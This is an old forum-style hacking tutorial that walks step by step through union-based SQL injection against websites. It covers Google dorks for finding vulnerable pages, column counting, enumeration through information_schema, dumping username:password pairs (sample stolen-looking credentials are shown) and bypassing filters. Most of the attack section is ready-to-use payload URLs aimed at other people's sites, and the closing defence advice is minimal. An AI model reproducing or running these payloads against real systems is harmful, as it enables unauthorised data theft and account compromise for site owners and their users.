SQL Injection Website Hacking Tutorial [Exclusive] [2014]

SQL Injection Website Hacking Tutorial [Exclusive] [2014]

SQL Injection
1) SQL Injection?
SQL Injection is type of web attack. Attacker use hole in script to take all data from database. Vulnerable sites are in format:

Code

http://www.link.com/index.php?id=

You can put anything else instead of index.
2) Finding vulnerable sites:
Best way to find vulnerable site is by using Google. We use these dorks to find sites but if you have your own may than go ahead :

 Code

inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=

3) Site vulnerability check:
There are 2 ways to check if site is vulnerable so here are the ways.
1st way, we got link:

Code

http://site.com/book.php?id=141

we are gonna add only ‘ at end of link so we get this link:

 Code

http://site.com/book.php?id=141'

2nd way, we got link:

 Code

http://site.com/book.php?id=141

we are going to add +and+1=2– at end of link so we get:

 Code

http://site.com/book.php?id=141+and+1=2--

If some part of page disappear (picture, text or something) or any error like (You have an error in your SQL syntax) site is vulnerable.
4) Finding number of columns
We can do it by using function order by, on link :

Code

[http://site.com/book.php?id=141

adding +order+by+5–

Code

http://site.com/book.php?id=141+order+by+5--

If page is opens normal there is more then 5 columns. Lets try with 10.

 Code

http://site.com/book.php?id=141+order+by+10--

Now some part of site disappeared, which means that there’s more then 5 and less then 10 columns. Lets try 7.

Code

http://site.com/book.php?id=141+order+by+7--

Page is opened normally which means that there is more then 7 and less then 10 columns. Lets try 8.

 Code

http://site.com/book.php?id=141+order+by+7--

on column 8 part of site disappear which means that there is 7 columns.
5) Finding vulnerable columns
Finding vulnerable columns is done with function union select all on link (in this case) we are going to add+union+select+all+1,2,3,4,5,6,7–

 Code

http://site.com/book.php?id=-141+union+select+all+1,2,3,4,5,6,7--

It is going to write numbers on page (in this case 1 2 3 4 5 6 7) which means that data can be taken from any column. We are going to take from second column.
6) Finding database version
As I said we are gonna take data from second column. Instead of number 2 we are going to put version() or @@version

Code

http://site.com/book.php?id=-141+union+select+all+1,@@version,3,4,5,6,7--

on page where number 2 was, it will show database version.
If database version is 4 we have to guess name of table and column, but if database version is 5 we have to guess database version.
We have version 5.0.51a-24+lenny5 which means that we don’t have to guess name of table and column.
7) Finding table names
If database version is 4 you wont be able to find name of table and column, you have to guess their names. If database version is skip this step.
Names of some possible tables:

Code

admin
admins
user
users
member
members

Names of some possible columns:

 Code

username
uname
un
user
name
nick
password
pw
pwd
passwd

If database version is 5 we can take name of table by doing next step: instead of number 2 we going to putgroup_concat(table_name) and after number of last column+from+information_schema.tables+where+table_schema=database()–
So we get this link:

Code

http://site.com/book.php?id=-141+union+select+all+1,group_concat(table_name),3,4,5,6,7+from+information_schem ​a.tables+where+table_schema=database()--

Instead of number 2 it showed name of table, in this case date, book, users. We gonna take columns from users table.
8) Finding column name
We found table name that we want and now from that we want to take columns. Instead ofgroup_concat(table_name) we are going to put group_concat(column_name) and instead of+from+information_schema.tables+where+table_schema=database()– we are going to put+from+information_schema.columns+where+table_name=hex– instead of hex we have to encrypt in hex name of table.
Go to:

Code

http://www.string-functions.com/string-hex.aspx

write the name of thetable (in this case users) and we get hex-ed number: 7573657273 so now can see the columns:

  Code

http://site.com/book.php?id=-141+union+select+all+1,group_concat(column_name),3,4,5,6,7+from+information_sche ​ma.columns+where+table_name=0x7573657273--

9) Taking data from columns
We got: id, name, surname, username, password, level.
We need only username and password.
Instead of group_concat(column_name) we put group_concat(username,0x3a,password) 0x3a stands for to make space between user and pw. Instead of from+information_schema.columns+where+table_name=0x7573657273– we put +from+users–
and we have link:

Code

http://site.com/book.php?id=-141+union+select+all+1,group_concat(username,0x3a,password),3,4,5,6,7+from+users​--

and result e.g.:

Code

sebrezovski:1533562
seratum:seratum
coach:53.21.1985.
biga:biga

which is users and passwords from this site.
10) Filter bypassing
In case when you write union+select+all says “not accessible” then change it to UnIoN+sElEcT+aLl
On some sites space is restricted so you can put + or /**/ (/* start of comment in php and finish */)
On some sites there is also restricted database version so you can use unhex(hex(version()))
11) Site protection from SQL Injection
Just put this code in your script:

Code

if(!is_numeric($_GET['id']))
{
echo 'It is gonna write text when some try to add /' or and+1=2';
}


Hope you enjoy